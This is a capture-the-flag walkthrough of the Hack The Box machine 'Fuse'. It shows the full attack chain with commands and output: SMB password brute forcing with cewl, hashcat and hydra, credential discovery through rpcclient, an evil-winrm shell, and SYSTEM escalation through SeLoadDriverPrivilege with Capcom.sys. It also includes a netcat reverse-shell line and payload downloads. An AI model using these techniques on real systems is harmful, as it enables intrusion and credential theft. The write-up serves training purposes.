Skip to main content

HTB Fuse


Initial Recon

sudo nmap -sS -sV -sC > rec_ini

While the scan was going on I tried checking if there is a webserver or not. It turns out that it is trying to access


So change the /etc/hosts file : fuse.fabricorp.local

Add the above line to /etc/hosts

Then reloading the webpage looks like this :

On checking the nmap scan, we get the following :

Let the full port scan, run in the background.

sudo nmap -p- -T5 > all_ports

Though it doesn’t give anything useful.

Checking the web server

In the landing page we get a few csv files and some usernames, which can be used later on.


There are also some cvs/excel files corresponding to them.

From the first CSV file we get another user bnielson

Trying the ldap

ldapsearch -h -x -s base namingcontexts

First we try to check the naming contexts using simple authentication.

We get the following naming contexts:

namingContexts: DC=fabricorp,DC=local
namingContexts: CN=Configuration,DC=fabricorp,DC=local
namingContexts: CN=Schsthompsonema,CN=Configuration,DC=fabricorp,DC=local
namingContexts: DC=DomainDnsZones,DC=fabricorp,DC=local
namingContexts: DC=ForestDnsZones,DC=fabricorp,DC=local

However, when I tried to further enumerate the namingcontexts, I got error.

Enumerating the smb shares

Upon trying to authenticate in the smb shares without any usernames or passwords, I got that no shares were listed.

smbclient -L //
Enter WORKGROUP\dosxuz's password: 
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
SMB1 disabled -- no workgroup available

So we need to bruteforce the username and password which have the permission to mount smb shares.

Generating passwords file using cew

For this bruteforce, we need a password file. To generate a password file I used cewl.

cewl -d 3 http://fuse.fabricorp.local/papercut/logs/html/index.htm -w ~/fuse/pass

Bruteforcing the passwords and usernames

To bruteforce the usernames and passwords I used hydra: After checking the number of passwords, it turns out to be 157.

wc pass 
 157  157 1089 pass

That multiplies by the 6 usernames we found is 942

Howevver, we know that the minimum length of smb passwords is 8, so we can sort out the words of length greater than 7.

cat pass | sort -u | awk 'length($0) > 7' > t

This will sort out the passwords greater than length 7.

cp t pass

However, even after bruteforcing with these passwords I didn’t get anything. So I generated my own passwords using hashcat.

ashcat --force --stdout pass -r /usr/share/oclHashcat/rules/best64.rule -r /usr/share/hashcat/rules/toggles1.rule | sort -u >  t

This will generate the passwords using the given rules and sort them uniquely and store them. However, we must shorten the wordlist more.

Sorting out words greater than 9 makes the wordlist significantly shorter.

cat pass | awk 'length($0) > 9' | sort -u | wc
  13323   13323  164500

It turns out that 3 users had the same password :

That is :


Had the same password Fabricorp01

Now we can try to login to the smb server.

smbclient -L // -U bhult

But for every username, the sameoutput was given, i.e the password must change:

The smbpasswd man page documents the password change options.

sudo smbpasswd -r -U tlavel

Now we can list and mount the shares

However, I wasn’t able to mount the smb shares as they seemed to be read only.

Trying the RPC

Instead I tried login into the RPC using the new credentials.

rpcclient -U bhult
rpcclient $> enumdomusers

While trying to enumerate the svc accounts. I found out that there is a password for the svc-print account. Therefore, we get the creds :

svc-print : $fab@s3Rv1ce$1

Getting shell

Now we can use evil-winrm to get a shell.

evil-winrm -u 'svc-print' -p '$fab@s3Rv1ce$1' -i


Upon checking the user priviledges, I get the following :

*Evil-WinRM* PS C:\Users\svc-print\Documents> whoami /priv


Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeLoadDriverPrivilege         Load and unload device drivers Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

There is the SeLoadDriverPrivilege PoC exploitation technique. It can be found in this artcle

PoC for privilege escalation

Also, this privilege is enabled, so we don’t need to get this token.

Loading the driver from unprivileged account

To load the driver from our service account, we need a PoC exploit, which can found here

For this the driver Capcom.sys is being used.

The exploit capcom can be foun here

The capcom.sys can be fonud here

For Compiling the EoPLoadDriver exploit.


Transfer the exploit payloads from your machine to the target machine.

$url = ""
$outpath = "C:\temp\VbLoadDriver.exe"
Invoke-WebRequest -Uri $url -OutFile $outpath
$url = ""
$outpath ="C:\temp\ExploitCapcom.exe"
Invoke-WebRequest -Uri $url -OutFile $outpath
$url = ""
$outpath = "C:\Users\svc-print\Downloads\Capcom.sys"
Invoke-WebRequest -Uri $url -OutFile $outpath

To use this exploit we also need the nc.exe to get a reverse shell.

$url = ""
$outpath = "C:\Users\svc-print\Downloads\nc64.exe"
Invoke-WebRequest -Uri $url -OutFile $outpath

We also need to create a batch file which will execute the nc.exe and connect back to our listener.

$url = ""
$outpath = "C:\Users\svc-print\Downloads\netcat.bat"
Invoke-WebRequest -Uri $url -OutFile $outpath

The netcat.bat file should contain the following :

C:\temp\nc64.exe 1331 -e powershell.exe

Run the exploits

*Evil-WinRM* PS C:\temp> .\VbLoadDriver.exe HKU\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\MyService C:\temp\Capcom.sys                                           
Attempting to enable SeLoadDriverPrivilege...                                                                                                                                                  
Successfully enabled privilege                                                                                                                                                                 
Creating registry values...                                                                                                                                                                    
Successfully created registry values                                                                                                                                                           
Loading driver...                                                                                                                                                                              
NtLoadDriver returned error code 0xC000010E                                                                                                                                                    
An instance of the service is already running                                                                                                                                                  
*Evil-WinRM* PS C:\temp> .\ExploitCapcom.exe
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000064
[*] Shellcode was placed at 000002018A280008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched
[*] Press any key to exit this program

Start the netcat listener before this :

nc -nlvp 1331

To get the user SID use

whoami /user

User HKU instead of HKLM and make sure the path are correct.

Tips for Compiling the Code

  1. Download and unzip the project file from github
  2. Open the function in VS19
  3. Select the sln file
  4. Select Release option and Build it
  5. If there is any problem like the missing Microsoft.Cpp.Default.props, change the VCTargets path in the system environment variable to the VCTargets file in VS 2017 folder.
  6. Then change the VS version to 2017 using cmd.
  7. VS might prompt you later on to install some additional files.

Note: the solution to most of these problems can be found online